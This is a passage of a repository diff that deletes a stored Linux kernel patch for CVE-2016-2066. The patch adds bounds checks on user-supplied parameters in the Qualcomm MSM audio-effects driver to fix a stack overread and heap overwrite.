eq->per_band_cfg[idx].filter_type = *values++; -+ eq->per_band_cfg[idx].filter_type = -+ GET_NEXT(values, param_max_offset, rc); - eq->per_band_cfg[idx].freq_millihertz = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - 
eq->per_band_cfg[idx].gain_millibels = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - eq->per_band_cfg[idx].quality_factor = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - } - if (command_config_state == CONFIG_SET) { - int config_param_length = EQ_CONFIG_PARAM_SZ + - (EQ_CONFIG_PER_BAND_PARAM_SZ* - eq->config.num_bands); -+ params_length += COMMAND_PAYLOAD_SZ + -+ config_param_length; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_CONFIG", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; -- *updt_params++ = AUDPROC_PARAM_ID_EQ_CONFIG; -- *updt_params++ = config_param_length; -- *updt_params++ = eq->config.eq_pregain; -- *updt_params++ = eq->config.preset_id; -- *updt_params++ = eq->config.num_bands; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_EQ_CONFIG; -+ *updt_params++ = -+ config_param_length; -+ *updt_params++ = -+ eq->config.eq_pregain; -+ *updt_params++ = -+ eq->config.preset_id; -+ *updt_params++ = -+ eq->config.num_bands; - for (idx = 0; idx < MAX_EQ_BANDS; idx++) { - if (eq->per_band_cfg[idx].band_idx < 0) - continue; - *updt_params++ = -- eq->per_band_cfg[idx].filter_type; -+ eq->per_band_cfg[idx].filter_type; - *updt_params++ = -- eq->per_band_cfg[idx].freq_millihertz; -+ eq->per_band_cfg[idx].freq_millihertz; - *updt_params++ = -- eq->per_band_cfg[idx].gain_millibels; -+ eq->per_band_cfg[idx].gain_millibels; - *updt_params++ = -- eq->per_band_cfg[idx].quality_factor; -+ eq->per_band_cfg[idx].quality_factor; - *updt_params++ = -- eq->per_band_cfg[idx].band_idx; -+ eq->per_band_cfg[idx].band_idx; - } -- params_length += COMMAND_PAYLOAD_SZ + -- config_param_length; - } - break; - case EQ_BAND_INDEX: -@@ -872,7 +1159,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- idx = *values++; -+ idx = GET_NEXT(values, param_max_offset, rc); - if (idx > MAX_EQ_BANDS) { - pr_err("EQ_BAND_INDEX:invalid band index\n"); - rc = 
-EINVAL; -@@ -882,14 +1169,21 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - pr_debug("%s: EQ_BAND_INDEX val:%d\n", - __func__, eq->band_index); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_BAND_INDEX_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_BAND_INDEX", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_EQ_BAND_INDEX; -- *updt_params++ = EQ_BAND_INDEX_PARAM_SZ; -- *updt_params++ = eq->band_index; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - EQ_BAND_INDEX_PARAM_SZ; -+ *updt_params++ = -+ eq->band_index; - } - break; - case EQ_SINGLE_BAND_FREQ: -@@ -902,18 +1196,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - pr_err("EQ_SINGLE_BAND_FREQ:invalid index\n"); - break; - } -- eq->freq_millihertz = *values++; -+ eq->freq_millihertz = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: EQ_SINGLE_BAND_FREQ idx:%d, val:%d\n", - __func__, eq->band_index, eq->freq_millihertz); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_SINGLE_BAND_FREQ_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_SINGLE_BAND_FREQ", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_EQ_SINGLE_BAND_FREQ; -- *updt_params++ = EQ_SINGLE_BAND_FREQ_PARAM_SZ; -- *updt_params++ = eq->freq_millihertz; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - EQ_SINGLE_BAND_FREQ_PARAM_SZ; -+ *updt_params++ = -+ eq->freq_millihertz; - } - break; - default: -@@ -921,7 +1223,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - break; - } - } -- if (params_length && !msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - 
else -@@ -938,9 +1240,10 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - { - int devices; - int num_commands; -- char *params; -+ char *params = NULL; - int *updt_params, i; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -+ long *param_max_offset; - int rc = 0; - - pr_debug("%s: instance: %d\n", __func__, instance); -@@ -949,9 +1252,11 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - __func__); - return -EINVAL; - } -- if (!ac) { -- pr_err("%s: cannot set audio effects as audio client is NULL\n", -- __func__); -+ param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ devices = GET_NEXT(values, param_max_offset, rc); -+ num_commands = GET_NEXT(values, param_max_offset, rc); -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { -+ pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } - params = kzalloc(params_length, GFP_KERNEL); -@@ -959,88 +1264,114 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - pr_err("%s, params memory alloc failed\n", __func__); - return -ENOMEM; - } -- devices = *values++; -- num_commands = *values++; - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case SOFT_VOLUME_GAIN_2CH: - case SOFT_VOLUME2_GAIN_2CH: - if (length != 2 || index_offset != 0) { -- pr_err("VOLUME_GAIN_2CH/VOLUME2_GAIN_2CH:invalid params\n"); -+ pr_err("VOLUME_GAIN_2CH: invalid params\n"); - rc = -EINVAL; - goto invalid_config; - } -- vol->left_gain = *values++; -- 
vol->right_gain = *values++; -+ vol->left_gain = GET_NEXT(values, param_max_offset, rc); -+ vol->right_gain = -+ GET_NEXT(values, param_max_offset, rc); - vol->master_gain = 0x2000; - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VOLUME/VOLUME2_GAIN_2CH", -+ rc); -+ if (rc != 0) -+ break; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN; -- *updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -- *updt_params++ = (vol->left_gain << 16) | -- vol->right_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ (vol->left_gain << 16) | -+ vol->right_gain; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN; - *updt_params++ = - SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -- *updt_params++ = vol->master_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ *updt_params++ = -+ vol->master_gain; - } - break; - case SOFT_VOLUME_GAIN_MASTER: - case SOFT_VOLUME2_GAIN_MASTER: - if (length != 1 || index_offset != 0) { -- pr_err("VOLUME_GAIN_MASTER/VOLUME2_GAIN_MASTER:invalid params\n"); -+ pr_err("VOLUME_GAIN_MASTER: invalid params\n"); - rc = -EINVAL; - goto invalid_config; - } - vol->left_gain = 0x2000; - vol->right_gain = 0x2000; -- vol->master_gain = *values++; -+ vol->master_gain = -+ GET_NEXT(values, 
param_max_offset, rc); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VOLUME/VOLUME2_GAIN_MASTER", -+ rc); -+ if (rc != 0) -+ break; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN; -- *updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -- *updt_params++ = (vol->left_gain << 16) | -- vol->right_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ (vol->left_gain << 16) | -+ vol->right_gain; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN; - *updt_params++ = - SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -- *updt_params++ = vol->master_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ *updt_params++ = -+ vol->master_gain; - } - break; - default: -@@ -1049,7 +1380,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - break; - } - } -- if (params_length) -+ if (params_length && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - invalid_config: -diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -index f814434..b4bd43d 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -@@ -2839,7 +2839,7 @@ static int msm_compr_audio_effects_config_info(struct 
snd_kcontrol *kcontrol, - struct snd_ctl_elem_info *uinfo) - { - uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER; -- uinfo->count = 128; -+ uinfo->count = MAX_PP_PARAMS_SZ; - uinfo->value.integer.min = 0; - uinfo->value.integer.max = 0xFFFFFFFF; - return 0; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2066/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2066/ANY/0001.patch deleted file mode 100644 index 06b77eb4..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2066/ANY/0001.patch +++ /dev/null 
@@ -1,1511 +0,0 @@
-From 775fca8289eff931f91ff6e8c36cf2034ba59e88 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang
-Date: Wed, 16 Mar 2016 12:51:03 +0800
-Subject: ASoC: msm: audio-effects: fix stack overread and heap overwrite
-
-Fix overwrite of updt_params allocated in heap, and stack overread
-where param pointer is passed from user space.
-
-CRs-Fixed: 989628
-Change-Id: Ida8bdb7da2fcb97023dce3b6eafe4b899a51cb66
-Signed-off-by: Weiyin Jiang
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 3 +-
- include/sound/msm-audio-effects-q6-v2.h | 4 +-
- sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 835 +++++++++++++++++-------
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 2 +-
- 4 files changed, 588 insertions(+), 256 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index c100c47..3ba20ca 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -20,7 +20,6 @@
- #include
- 
- #define MAX_CHANNELS_SUPPORTED 8
--#define MAX_PP_PARAMS_SZ 128
- #define WAIT_TIMEDOUT_DURATION_SECS 1
- 
- struct q6audio_effects {
-diff --git a/include/sound/msm-audio-effects-q6-v2.h b/include/sound/msm-audio-effects-q6-v2.h
-index cbdea32..6bc2338 100644
---- a/include/sound/msm-audio-effects-q6-v2.h
-+++ b/include/sound/msm-audio-effects-q6-v2.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -16,6 +16,8 @@
- 
- #include
- 
-+#define MAX_PP_PARAMS_SZ 128
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- int topology);
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-index e26c453..1c08842 100644
---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -20,6 +20,24 @@
- 
- #define MAX_ENABLE_CMD_SIZE 32
- 
-+#define GET_NEXT(ptr, upper_limit, rc) \
-+({ \
-+ if (((ptr) + 1) > (upper_limit)) { \
-+ pr_err("%s: param list out of boundary\n", __func__); \
-+ (rc) = -EINVAL; \
-+ } \
-+ ((rc) == 0) ? *(ptr)++ : -EINVAL; \
-+})
-+
-+#define CHECK_PARAM_LEN(len, max_len, tag, rc) \
-+do { \
-+ if ((len) > (max_len)) { \
-+ pr_err("%s: params length overflows\n", (tag)); \
-+ (rc) = -EINVAL; \
-+ } \
-+} while (0)
-+
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- int topology)
- {
-@@ -109,15 +127,16 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- struct virtualizer_params *virtualizer,
- long *values)
- {
-- int devices = *values++;
-- int num_commands = *values++;
-- char *params;
-+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+ char *params = NULL;
-+ int rc = 0;
-+ int devices = GET_NEXT(values, param_max_offset, rc);
-+ int num_commands = GET_NEXT(values, param_max_offset, rc);
- int *updt_params, i, prev_enable_flag;
- uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-- int rc = 0;
- 
- pr_debug("%s\n", __func__);
-- if (!ac) {
-+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- pr_err("%s: cannot set audio effects\n", __func__);
- return -EINVAL;
- }
-@@ -130,10 +149,14 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- updt_params = (int *)params;
- params_length = 0;
- for (i = 0; i < num_commands; i++) {
-- uint32_t command_id = *values++;
-- uint32_t command_config_state = *values++;
-- uint32_t index_offset = *values++;
-- uint32_t length = *values++;
-+ uint32_t command_id =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t command_config_state =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t index_offset =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t length =
-+ GET_NEXT(values, param_max_offset, rc);
- switch (command_id) {
- case VIRTUALIZER_ENABLE:
- if (length != 1 || index_offset != 0) {
-@@ -142,17 +165,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- goto invalid_config;
- }
- prev_enable_flag = virtualizer->enable_flag;
-- virtualizer->enable_flag = *values++;
-+ virtualizer->enable_flag =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s:VIRT ENABLE prev:%d, new:%d\n", __func__,
- prev_enable_flag, virtualizer->enable_flag);
- if (prev_enable_flag != virtualizer->enable_flag) {
-- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-- *updt_params++ =
-- AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
-- *updt_params++ = VIRTUALIZER_ENABLE_PARAM_SZ;
-- *updt_params++ = virtualizer->enable_flag;
- params_length += COMMAND_PAYLOAD_SZ +
- VIRTUALIZER_ENABLE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "VIRT ENABLE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_VIRTUALIZER;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
-+ *updt_params++ =
-+ VIRTUALIZER_ENABLE_PARAM_SZ;
-+ *updt_params++ =
-+ virtualizer->enable_flag;
- }
- break;
- case VIRTUALIZER_STRENGTH:
-@@ -161,17 +193,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- virtualizer->strength = *values++;
-+ virtualizer->strength =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: VIRT STRENGTH val: %d\n",
- __func__, virtualizer->strength);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ VIRTUALIZER_STRENGTH_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "VIRT STRENGTH", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_VIRTUALIZER;
- *updt_params++ =
- AUDPROC_PARAM_ID_VIRTUALIZER_STRENGTH;
-- *updt_params++ = VIRTUALIZER_STRENGTH_PARAM_SZ;
-- *updt_params++ = virtualizer->strength;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- VIRTUALIZER_STRENGTH_PARAM_SZ;
-+ *updt_params++ =
-+ virtualizer->strength;
- }
- break;
- case VIRTUALIZER_OUT_TYPE:
-@@ -180,17 +221,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- virtualizer->out_type = *values++;
-+ virtualizer->out_type =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: VIRT OUT_TYPE val:%d\n",
- __func__, virtualizer->out_type);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "VIRT OUT_TYPE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_VIRTUALIZER;
- *updt_params++ =
- AUDPROC_PARAM_ID_VIRTUALIZER_OUT_TYPE;
-- *updt_params++ = VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-- *updt_params++ = virtualizer->out_type;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+ *updt_params++ =
-+ virtualizer->out_type;
- }
- break;
- case VIRTUALIZER_GAIN_ADJUST:
-@@ -199,18 +249,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- virtualizer->gain_adjust = *values++;
-+ virtualizer->gain_adjust =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: VIRT GAIN_ADJUST val:%d\n",
- __func__, virtualizer->gain_adjust);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-- *updt_params++ =
-- AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
-- *updt_params++ =
-- VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-- *updt_params++ = virtualizer->gain_adjust;
- params_length += COMMAND_PAYLOAD_SZ +
- VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "VIRT GAIN_ADJUST", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_VIRTUALIZER;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
-+ *updt_params++ =
-+ VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+ *updt_params++ =
-+ virtualizer->gain_adjust;
- }
- break;
- default:
-@@ -218,7 +276,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- break;
- }
- }
-- if (params_length && !msm_dts_eagle_is_hpx_on())
-+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- q6asm_send_audio_effects_params(ac, params,
- params_length);
- else
-@@ -232,15 +290,16 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- struct reverb_params *reverb,
- long *values)
- {
-- int devices = *values++;
-- int num_commands = *values++;
-- char *params;
-+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+ char *params = NULL;
-+ int rc = 0;
-+ int devices = GET_NEXT(values, param_max_offset, rc);
-+ int num_commands = GET_NEXT(values, param_max_offset, rc);
- int *updt_params, i, prev_enable_flag;
- uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-- int rc = 0;
- 
- pr_debug("%s\n", __func__);
-- if (!ac) {
-+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- pr_err("%s: cannot set audio effects\n", __func__);
- return -EINVAL;
- }
-@@ -253,10 +312,14 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- updt_params = (int *)params;
- params_length = 0;
- for (i = 0; i < num_commands; i++) {
-- uint32_t command_id = *values++;
-- uint32_t command_config_state = *values++;
-- uint32_t index_offset = *values++;
-- uint32_t length = *values++;
-+ uint32_t command_id =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t command_config_state =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t index_offset =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t length =
-+ GET_NEXT(values, param_max_offset, rc);
- switch (command_id) {
- case REVERB_ENABLE:
- if (length != 1 || index_offset != 0) {
-@@ -265,16 +328,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- goto invalid_config;
- }
- prev_enable_flag = reverb->enable_flag;
-- reverb->enable_flag = *values++;
-+ reverb->enable_flag =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s:REVERB_ENABLE prev:%d,new:%d\n", __func__,
- prev_enable_flag, reverb->enable_flag);
- if (prev_enable_flag != reverb->enable_flag) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-- *updt_params++ = AUDPROC_PARAM_ID_REVERB_ENABLE;
-- *updt_params++ = REVERB_ENABLE_PARAM_SZ;
-- *updt_params++ = reverb->enable_flag;
- params_length += COMMAND_PAYLOAD_SZ +
- REVERB_ENABLE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_ENABLE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_REVERB_ENABLE;
-+ *updt_params++ =
-+ REVERB_ENABLE_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->enable_flag;
- }
- break;
- case REVERB_MODE:
-@@ -283,16 +356,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->mode = *values++;
-+ reverb->mode =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_MODE val:%d\n",
- __func__, reverb->mode);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-- *updt_params++ = AUDPROC_PARAM_ID_REVERB_MODE;
-- *updt_params++ = REVERB_MODE_PARAM_SZ;
-- *updt_params++ = reverb->mode;
- params_length += COMMAND_PAYLOAD_SZ +
- REVERB_MODE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_MODE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_REVERB_MODE;
-+ *updt_params++ =
-+ REVERB_MODE_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->mode;
- }
- break;
- case REVERB_PRESET:
-@@ -301,16 +384,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->preset = *values++;
-+ reverb->preset =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_PRESET val:%d\n",
- __func__, reverb->preset);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-- *updt_params++ = AUDPROC_PARAM_ID_REVERB_PRESET;
-- *updt_params++ = REVERB_PRESET_PARAM_SZ;
-- *updt_params++ = reverb->preset;
- params_length += COMMAND_PAYLOAD_SZ +
- REVERB_PRESET_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_PRESET", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_REVERB_PRESET;
-+ *updt_params++ =
-+ REVERB_PRESET_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->preset;
- }
- break;
- case REVERB_WET_MIX:
-@@ -319,17 +412,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->wet_mix = *values++;
-+ reverb->wet_mix =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_WET_MIX val:%d\n",
- __func__, reverb->wet_mix);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_WET_MIX_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_WET_MIX", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_WET_MIX;
-- *updt_params++ = REVERB_WET_MIX_PARAM_SZ;
-- *updt_params++ = reverb->wet_mix;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_WET_MIX_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->wet_mix;
- }
- break;
- case REVERB_GAIN_ADJUST:
-@@ -338,17 +440,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->gain_adjust = *values++;
-+ reverb->gain_adjust =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_GAIN_ADJUST val:%d\n",
- __func__, reverb->gain_adjust);
